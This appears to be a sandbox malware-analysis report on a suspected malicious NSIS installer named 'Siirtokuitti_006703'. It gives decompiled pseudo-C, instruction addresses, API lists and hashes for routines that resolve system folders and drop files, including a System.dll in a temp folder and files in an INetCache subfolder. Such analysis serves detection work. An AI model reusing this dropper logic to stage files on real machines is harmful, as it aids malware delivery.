                                                                                                                      					_v20 = _t76 | 0x00008000;
                                                                                                                      					if(_t103 != 2) {
                                                                                                                      						__eflags = _t103 - 3;
                                                                                                                      						if(_t103 != 3) {
                                                                                                                      							__eflags = _t103 - 1;
                                                                                                                      							if(_t103 == 1) {
                                                                                                                      								__eflags = (_t47 | 0xffffffff) - _v8;
                                                                                                                      								E004063D2(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
                                                                                                                      							}
                                                                                                                      							L43:
                                                                                                                      							_t48 = lstrlenW(_t110);
                                                                                                                      							_t96 = _a8;
                                                                                                                      							_t110 =  &(_t110[_t48]);
                                                                                                                      							_t44 = 0x4281e0;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t106 = _v8;
                                                                                                                      						__eflags = _t106 - 0x1d;
                                                                                                                      						if(_t106 != 0x1d) {
                                                                                                                      							__eflags = (_t106 << 0xb) + 0x42b000;
                                                                                                                      							E004063B0(_t110, (_t106 << 0xb) + 0x42b000);
                                                                                                                      						} else {
                                                                                                                      							E004062F7(_t110,  *0x42a248);
                                                                                                                      						}
                                                                                                                      						__eflags = _t106 + 0xffffffeb - 7;
                                                                                                                      						if(_t106 + 0xffffffeb < 7) {
                                                                                                                      							L34:
                                                                                                                      							E00406644(_t110);
                                                                                                                      						}
                                                                                                                      						goto L43;
                                                                                                                      					}
                                                                                                                      					_t86 =  *0x42a24c;
                                                                                                                      					__eflags = _t86;
                                                                                                                      					_t108 = 2;
                                                                                                                      					if(_t86 >= 0) {
                                                                                                                      						L13:
                                                                                                                      						_v8 = 1;
                                                                                                                      						L14:
                                                                                                                      						__eflags =  *0x42a2e4;
                                                                                                                      						if( *0x42a2e4 != 0) {
                                                                                                                      							_t108 = 4;
                                                                                                                      						}
                                                                                                                      						__eflags = _t47;
                                                                                                                      						if(__eflags >= 0) {
                                                                                                                      							__eflags = _t47 - 0x25;
                                                                                                                      							if(_t47 != 0x25) {
                                                                                                                      								__eflags = _t47 - 0x24;
                                                                                                                      								if(_t47 == 0x24) {
                                                                                                                      									GetWindowsDirectoryW(_t110, 0x400);
                                                                                                                      									_t108 = 0;
                                                                                                                      								}
                                                                                                                      								while(1) {
                                                                                                                      									__eflags = _t108;
                                                                                                                      									if(_t108 == 0) {
                                                                                                                      										goto L30;
                                                                                                                      									}
                                                                                                                      									_t58 =  *0x42a244;
                                                                                                                      									_t108 = _t108 - 1;
                                                                                                                      									__eflags = _t58;
                                                                                                                      									if(_t58 == 0) {
                                                                                                                      										L26:
                                                                                                                      										_t60 = SHGetSpecialFolderLocation( *0x42a248,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
                                                                                                                      										__eflags = _t60;
                                                                                                                      										if(_t60 != 0) {
                                                                                                                      											L28:
                                                                                                                      											 *_t110 =  *_t110 & 0x00000000;
                                                                                                                      											__eflags =  *_t110;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      										__imp__SHGetPathFromIDListW(_v12, _t110);
                                                                                                                      										__imp__CoTaskMemFree(_v12);
                                                                                                                      										__eflags = _t60;
                                                                                                                      										if(_t60 != 0) {
                                                                                                                      											goto L30;
                                                                                                                      										}
                                                                                                                      										goto L28;
                                                                                                                      									}
                                                                                                                      									__eflags = _v8;
                                                                                                                      									if(_v8 == 0) {
                                                                                                                      										goto L26;
                                                                                                                      									}
                                                                                                                      									_t62 =  *_t58( *0x42a248,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
                                                                                                                      									__eflags = _t62;
                                                                                                                      									if(_t62 == 0) {
                                                                                                                      										goto L30;
                                                                                                                      									}
                                                                                                                      									goto L26;
                                                                                                                      								}
                                                                                                                      								goto L30;
                                                                                                                      							}
                                                                                                                      							GetSystemDirectoryW(_t110, 0x400);
                                                                                                                      							goto L30;
                                                                                                                      						} else {
                                                                                                                      							E0040627E( *0x42a298, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
                                                                                                                      							__eflags =  *_t110;
                                                                                                                      							if( *_t110 != 0) {
                                                                                                                      								L32:
                                                                                                                      								__eflags = _t76 - 0x1a;
                                                                                                                      								if(_t76 == 0x1a) {
                                                                                                                      									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                                      								}
                                                                                                                      								goto L34;
                                                                                                                      							}
                                                                                                                      							E004063D2(_t76, _t108, _t110, _t110, _t76);
                                                                                                                      							L30:
                                                                                                                      							__eflags =  *_t110;
                                                                                                                      							if( *_t110 == 0) {
                                                                                                                      								goto L34;
                                                                                                                      							}
                                                                                                                      							_t76 = _v16;
                                                                                                                      							goto L32;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					__eflags = _t86 - 0x5a04;
                                                                                                                      					if(_t86 == 0x5a04) {
                                                                                                                      						goto L13;
                                                                                                                      					}
                                                                                                                      					__eflags = _t76 - 0x23;
                                                                                                                      					if(_t76 == 0x23) {
                                                                                                                      						goto L13;
                                                                                                                      					}
                                                                                                                      					__eflags = _t76 - 0x2e;
                                                                                                                      					if(_t76 == 0x2e) {
                                                                                                                      						goto L13;
                                                                                                                      					} else {
                                                                                                                      						_v8 = _v8 & 0x00000000;
                                                                                                                      						goto L14;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				 *_t110 =  *_t110 & 0x00000000;
                                                                                                                      				if(_a4 == 0) {
                                                                                                                      					return _t44;
                                                                                                                      				}
                                                                                                                      				return E004063B0(_a4, _t44);
                                                                                                                      			}






























                                                                                                                      0x004063d2
                                                                                                                      0x004063d2
                                                                                                                      0x004063d2
                                                                                                                      0x004063d8
                                                                                                                      0x004063dd
                                                                                                                      0x004063ee
                                                                                                                      0x004063ee
                                                                                                                      0x004063f6
                                                                                                                      0x004063f7
                                                                                                                      0x004063f8
                                                                                                                      0x004063f9
                                                                                                                      0x004063fc
                                                                                                                      0x00406404
                                                                                                                      0x00406406
                                                                                                                      0x0040641f
                                                                                                                      0x00406422
                                                                                                                      0x00406422
                                                                                                                      0x0040661e
                                                                                                                      0x0040661e
                                                                                                                      0x00406624
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406432
                                                                                                                      0x00406438
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406440
                                                                                                                      0x00406441
                                                                                                                      0x00406443
                                                                                                                      0x00406447
                                                                                                                      0x0040644a
                                                                                                                      0x0040660b
                                                                                                                      0x00406619
                                                                                                                      0x0040661c
                                                                                                                      0x0040661c
                                                                                                                      0x0040660d
                                                                                                                      0x00406610
                                                                                                                      0x00406613
                                                                                                                      0x00406615
                                                                                                                      0x00406615
                                                                                                                      0x00000000
                                                                                                                      0x0040660b
                                                                                                                      0x00406450
                                                                                                                      0x00406453
                                                                                                                      0x00406462
                                                                                                                      0x00406469
                                                                                                                      0x00406473
                                                                                                                      0x00406477
                                                                                                                      0x0040647a
                                                                                                                      0x0040647d
                                                                                                                      0x00406482
                                                                                                                      0x00406487
                                                                                                                      0x0040648b
                                                                                                                      0x0040648e
                                                                                                                      0x004065ae
                                                                                                                      0x004065b2
                                                                                                                      0x004065e5
                                                                                                                      0x004065e9
                                                                                                                      0x004065ee
                                                                                                                      0x004065f3
                                                                                                                      0x004065f3
                                                                                                                      0x004065f8
                                                                                                                      0x004065f9
                                                                                                                      0x004065fe
                                                                                                                      0x00406601
                                                                                                                      0x00406604
                                                                                                                      0x00000000
                                                                                                                      0x00406604
                                                                                                                      0x004065b4
                                                                                                                      0x004065b7
                                                                                                                      0x004065ba
                                                                                                                      0x004065cf
                                                                                                                      0x004065d6
                                                                                                                      0x004065bc
                                                                                                                      0x004065c3
                                                                                                                      0x004065c3
                                                                                                                      0x004065de
                                                                                                                      0x004065e1
                                                                                                                      0x004065a6
                                                                                                                      0x004065a7
                                                                                                                      0x004065a7
                                                                                                                      0x00000000
                                                                                                                      0x004065e1
                                                                                                                      0x00406494
                                                                                                                      0x0040649c
                                                                                                                      0x0040649e
                                                                                                                      0x0040649f
                                                                                                                      0x004064b8
                                                                                                                      0x004064b8
                                                                                                                      0x004064bf
                                                                                                                      0x004064bf
                                                                                                                      0x004064c6
                                                                                                                      0x004064ca
                                                                                                                      0x004064ca
                                                                                                                      0x004064cb
                                                                                                                      0x004064cd
                                                                                                                      0x00406508
                                                                                                                      0x0040650b
                                                                                                                      0x0040651b
                                                                                                                      0x0040651e
                                                                                                                      0x00406526
                                                                                                                      0x0040652c
                                                                                                                      0x0040652c
                                                                                                                      0x00406589
                                                                                                                      0x00406589
                                                                                                                      0x0040658b
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406530
                                                                                                                      0x00406537
                                                                                                                      0x00406538
                                                                                                                      0x0040653a
                                                                                                                      0x00406554
                                                                                                                      0x00406562
                                                                                                                      0x00406568
                                                                                                                      0x0040656a
                                                                                                                      0x00406585
                                                                                                                      0x00406585
                                                                                                                      0x00406585
                                                                                                                      0x00000000
                                                                                                                      0x00406585
                                                                                                                      0x00406570
                                                                                                                      0x0040657b
                                                                                                                      0x00406581
                                                                                                                      0x00406583
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406583
                                                                                                                      0x0040653c
                                                                                                                      0x0040653f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040654e
                                                                                                                      0x00406550
                                                                                                                      0x00406552
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406552
                                                                                                                      0x00000000
                                                                                                                      0x00406589
                                                                                                                      0x00406513
                                                                                                                      0x00000000
                                                                                                                      0x004064cf
                                                                                                                      0x004064ed
                                                                                                                      0x004064f2
                                                                                                                      0x004064f6
                                                                                                                      0x00406596
                                                                                                                      0x00406596
                                                                                                                      0x00406599
                                                                                                                      0x004065a1
                                                                                                                      0x004065a1
                                                                                                                      0x00000000
                                                                                                                      0x00406599
                                                                                                                      0x004064fe
                                                                                                                      0x0040658d
                                                                                                                      0x0040658d
                                                                                                                      0x00406591
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406593
                                                                                                                      0x00000000
                                                                                                                      0x00406593
                                                                                                                      0x004064cd
                                                                                                                      0x004064a1
                                                                                                                      0x004064a6
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004064a8
                                                                                                                      0x004064ab
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004064ad
                                                                                                                      0x004064b0
                                                                                                                      0x00000000
                                                                                                                      0x004064b2
                                                                                                                      0x004064b2
                                                                                                                      0x00000000
                                                                                                                      0x004064b2
                                                                                                                      0x004064b0
                                                                                                                      0x0040662a
                                                                                                                      0x00406635
                                                                                                                      0x00406641
                                                                                                                      0x00406641
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406513
                                                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406526
                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(0040544B,00000000,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406562
                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406570
                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040657B
                                                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065A1
                                                                                                                      • lstrlenW.KERNEL32(Call,00000000,00422708,?,0040544B,00422708,00000000), ref: 004065F9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                      • API String ID: 717251189-1230650788
                                                                                                                      • Opcode ID: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                                                                                      • Instruction ID: 781aa6555cb08bc9a39a1310e2b7c8a7a94b670d8f790df7948cd7d686d0a9f3
                                                                                                                      • Opcode Fuzzy Hash: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                                                                                      • Instruction Fuzzy Hash: 52611771600101ABDF209F54ED40ABE37A5AF40314F56453FE947B62D4D73D8AA2CB5D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 638 40176f-401794 call 402c37 call 405cf8 643 401796-40179c call 4063b0 638->643 644 40179e-4017b0 call 4063b0 call 405c81 lstrcatW 638->644 649 4017b5-4017b6 call 406644 643->649 644->649 653 4017bb-4017bf 649->653 654 4017c1-4017cb call 4066f3 653->654 655 4017f2-4017f5 653->655 662 4017dd-4017ef 654->662 663 4017cd-4017db CompareFileTime 654->663 657 4017f7-4017f8 call 405e7d 655->657 658 4017fd-401819 call 405ea2 655->658 657->658 665 40181b-40181e 658->665 666 40188d-4018b6 call 405414 call 4031ba 658->666 662->655 663->662 668 401820-40185e call 4063b0 * 2 call 4063d2 call 4063b0 call 405a12 665->668 669 40186f-401879 call 405414 665->669 679 4018b8-4018bc 666->679 680 4018be-4018ca SetFileTime 666->680 668->653 701 401864-401865 668->701 681 401882-401888 669->681 679->680 683 4018d0-4018db CloseHandle 679->683 680->683 684 402ac8 681->684 687 4018e1-4018e4 683->687 688 402abf-402ac2 683->688 686 402aca-402ace 684->686 690 4018e6-4018f7 call 4063d2 lstrcatW 687->690 691 4018f9-4018fc call 4063d2 687->691 688->684 697 401901-4022f6 call 405a12 690->697 691->697 697->686 701->681 703 401867-401868 701->703 703->669
                                                                                                                      C-Code - Quality: 77%
                                                                                                                      			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                                                                      				void* __edi;
                                                                                                                      				void* _t35;
                                                                                                                      				void* _t43;
                                                                                                                      				void* _t45;
                                                                                                                      				FILETIME* _t51;
                                                                                                                      				FILETIME* _t64;
                                                                                                                      				void* _t66;
                                                                                                                      				signed int _t72;
                                                                                                                      				FILETIME* _t73;
                                                                                                                      				FILETIME* _t77;
                                                                                                                      				signed int _t79;
                                                                                                                      				void* _t81;
                                                                                                                      				void* _t82;
                                                                                                                      				WCHAR* _t84;
                                                                                                                      				void* _t86;
                                                                                                                      
                                                                                                                      				_t77 = __ebx;
                                                                                                                      				 *(_t86 - 8) = E00402C37(0x31);
                                                                                                                      				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
                                                                                                                      				_t35 = E00405CF8( *(_t86 - 8));
                                                                                                                      				_push( *(_t86 - 8));
                                                                                                                      				_t84 = L"Call";
                                                                                                                      				if(_t35 == 0) {
                                                                                                                      					lstrcatW(E00405C81(E004063B0(_t84, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Standpost\\mos\\Ensileringen")), ??);
                                                                                                                      				} else {
                                                                                                                      					E004063B0();
                                                                                                                      				}
                                                                                                                      				E00406644(_t84);
                                                                                                                      				while(1) {
                                                                                                                      					__eflags =  *(_t86 + 8) - 3;
                                                                                                                      					if( *(_t86 + 8) >= 3) {
                                                                                                                      						_t66 = E004066F3(_t84);
                                                                                                                      						_t79 = 0;
                                                                                                                      						__eflags = _t66 - _t77;
                                                                                                                      						if(_t66 != _t77) {
                                                                                                                      							_t73 = _t66 + 0x14;
                                                                                                                      							__eflags = _t73;
                                                                                                                      							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
                                                                                                                      						}
                                                                                                                      						asm("sbb eax, eax");
                                                                                                                      						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                                                                      						__eflags = _t72;
                                                                                                                      						 *(_t86 + 8) = _t72;
                                                                                                                      					}
                                                                                                                      					__eflags =  *(_t86 + 8) - _t77;
                                                                                                                      					if( *(_t86 + 8) == _t77) {
                                                                                                                      						E00405E7D(_t84);
                                                                                                                      					}
                                                                                                                      					__eflags =  *(_t86 + 8) - 1;
                                                                                                                      					_t43 = E00405EA2(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                                                                      					__eflags = _t43 - 0xffffffff;
                                                                                                                      					 *(_t86 - 0x30) = _t43;
                                                                                                                      					if(_t43 != 0xffffffff) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					__eflags =  *(_t86 + 8) - _t77;
                                                                                                                      					if( *(_t86 + 8) != _t77) {
                                                                                                                      						E00405414(0xffffffe2,  *(_t86 - 8));
                                                                                                                      						__eflags =  *(_t86 + 8) - 2;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                                                                      						}
                                                                                                                      						L31:
                                                                                                                      						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                                                                                                      						__eflags =  *0x42a2e8;
                                                                                                                      						goto L32;
                                                                                                                      					} else {
                                                                                                                      						E004063B0("C:\Users\Arthur\AppData\Local\Temp\nsl3DD.tmp", _t81);
                                                                                                                      						E004063B0(_t81, _t84);
                                                                                                                      						E004063D2(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsl3DD.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
                                                                                                                      						E004063B0(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsl3DD.tmp");
                                                                                                                      						_t64 = E00405A12("C:\Users\Arthur\AppData\Local\Temp\nsl3DD.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
                                                                                                                      						__eflags = _t64;
                                                                                                                      						if(_t64 == 0) {
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							__eflags = _t64 == 1;
                                                                                                                      							if(_t64 == 1) {
                                                                                                                      								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                                                                                                      								L32:
                                                                                                                      								_t51 = 0;
                                                                                                                      								__eflags = 0;
                                                                                                                      							} else {
                                                                                                                      								_push(_t84);
                                                                                                                      								_push(0xfffffffa);
                                                                                                                      								E00405414();
                                                                                                                      								L29:
                                                                                                                      								_t51 = 0x7fffffff;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					L33:
                                                                                                                      					return _t51;
                                                                                                                      				}
                                                                                                                      				E00405414(0xffffffea,  *(_t86 - 8));
                                                                                                                      				 *0x42a314 =  *0x42a314 + 1;
                                                                                                                      				_t45 = E004031BA(_t79,  *((intOrPtr*)(_t86 - 0x20)),  *(_t86 - 0x30), _t77, _t77); // executed
                                                                                                                      				 *0x42a314 =  *0x42a314 - 1;
                                                                                                                      				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
                                                                                                                      				_t82 = _t45;
                                                                                                                      				if( *(_t86 - 0x1c) != 0xffffffff) {
                                                                                                                      					L22:
                                                                                                                      					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
                                                                                                                      				} else {
                                                                                                                      					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
                                                                                                                      					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
                                                                                                                      						goto L22;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				CloseHandle( *(_t86 - 0x30)); // executed
                                                                                                                      				__eflags = _t82 - _t77;
                                                                                                                      				if(_t82 >= _t77) {
                                                                                                                      					goto L31;
                                                                                                                      				} else {
                                                                                                                      					__eflags = _t82 - 0xfffffffe;
                                                                                                                      					if(_t82 != 0xfffffffe) {
                                                                                                                      						E004063D2(_t77, _t82, _t84, _t84, 0xffffffee);
                                                                                                                      					} else {
                                                                                                                      						E004063D2(_t77, _t82, _t84, _t84, 0xffffffe9);
                                                                                                                      						lstrcatW(_t84,  *(_t86 - 8));
                                                                                                                      					}
                                                                                                                      					_push(0x200010);
                                                                                                                      					_push(_t84);
                                                                                                                      					E00405A12();
                                                                                                                      					goto L29;
                                                                                                                      				}
                                                                                                                      				goto L33;
                                                                                                                      			}


















                                                                                                                      0x0040176f
                                                                                                                      0x00401776
                                                                                                                      0x00401782
                                                                                                                      0x00401785
                                                                                                                      0x0040178a
                                                                                                                      0x0040178d
                                                                                                                      0x00401794
                                                                                                                      0x004017b0
                                                                                                                      0x00401796
                                                                                                                      0x00401797
                                                                                                                      0x00401797
                                                                                                                      0x004017b6
                                                                                                                      0x004017bb
                                                                                                                      0x004017bb
                                                                                                                      0x004017bf
                                                                                                                      0x004017c2
                                                                                                                      0x004017c7
                                                                                                                      0x004017c9
                                                                                                                      0x004017cb
                                                                                                                      0x004017d0
                                                                                                                      0x004017d0
                                                                                                                      0x004017db
                                                                                                                      0x004017db
                                                                                                                      0x004017ec
                                                                                                                      0x004017ee
                                                                                                                      0x004017ee
                                                                                                                      0x004017ef
                                                                                                                      0x004017ef
                                                                                                                      0x004017f2
                                                                                                                      0x004017f5
                                                                                                                      0x004017f8
                                                                                                                      0x004017f8
                                                                                                                      0x004017ff
                                                                                                                      0x0040180e
                                                                                                                      0x00401813
                                                                                                                      0x00401816
                                                                                                                      0x00401819
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040181b
                                                                                                                      0x0040181e
                                                                                                                      0x00401874
                                                                                                                      0x00401879
                                                                                                                      0x004015b6
                                                                                                                      0x00402885
                                                                                                                      0x00402885
                                                                                                                      0x00402abf
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ac2
                                                                                                                      0x00000000
                                                                                                                      0x00401820
                                                                                                                      0x00401826
                                                                                                                      0x0040182d
                                                                                                                      0x0040183a
                                                                                                                      0x00401845
                                                                                                                      0x0040185b
                                                                                                                      0x0040185b
                                                                                                                      0x0040185e
                                                                                                                      0x00000000
                                                                                                                      0x00401864
                                                                                                                      0x00401864
                                                                                                                      0x00401865
                                                                                                                      0x00401882
                                                                                                                      0x00402ac8
                                                                                                                      0x00402ac8
                                                                                                                      0x00402ac8
                                                                                                                      0x00401867
                                                                                                                      0x00401867
                                                                                                                      0x00401868
                                                                                                                      0x00401493
                                                                                                                      0x004022f1
                                                                                                                      0x004022f1
                                                                                                                      0x004022f1
                                                                                                                      0x00401865
                                                                                                                      0x0040185e
                                                                                                                      0x00402aca
                                                                                                                      0x00402ace
                                                                                                                      0x00402ace
                                                                                                                      0x00401892
                                                                                                                      0x00401897
                                                                                                                      0x004018a5
                                                                                                                      0x004018aa
                                                                                                                      0x004018b0
                                                                                                                      0x004018b4
                                                                                                                      0x004018b6
                                                                                                                      0x004018be
                                                                                                                      0x004018ca
                                                                                                                      0x004018b8
                                                                                                                      0x004018b8
                                                                                                                      0x004018bc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004018bc
                                                                                                                      0x004018d3
                                                                                                                      0x004018d9
                                                                                                                      0x004018db
                                                                                                                      0x00000000
                                                                                                                      0x004018e1
                                                                                                                      0x004018e1
                                                                                                                      0x004018e4
                                                                                                                      0x004018fc
                                                                                                                      0x004018e6
                                                                                                                      0x004018e9
                                                                                                                      0x004018f2
                                                                                                                      0x004018f2
                                                                                                                      0x00401901
                                                                                                                      0x00401906
                                                                                                                      0x004022ec
                                                                                                                      0x00000000
                                                                                                                      0x004022ec
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Standpost\mos\Ensileringen,?,?,00000031), ref: 004017D5
                                                                                                                        • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                        • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC), ref: 0040546F
                                                                                                                        • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Standpost\mos\Ensileringen$C:\Users\user\AppData\Local\Temp\nsl3DD.tmp$C:\Users\user\AppData\Local\Temp\nsl3DD.tmp\System.dll$Call
                                                                                                                      • API String ID: 1941528284-2276947732
                                                                                                                      • Opcode ID: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                                                                                      • Instruction ID: 6d789f9af123ab0f865e5502c846d56d3cd3544f1fa5f1ae7e054fd30d3333f6
                                                                                                                      • Opcode Fuzzy Hash: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                                                                                      • Instruction Fuzzy Hash: E741D871510115BACF117BA5CD45EAF3679EF01328B20423FF922F10E1DB3C8A519AAE
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
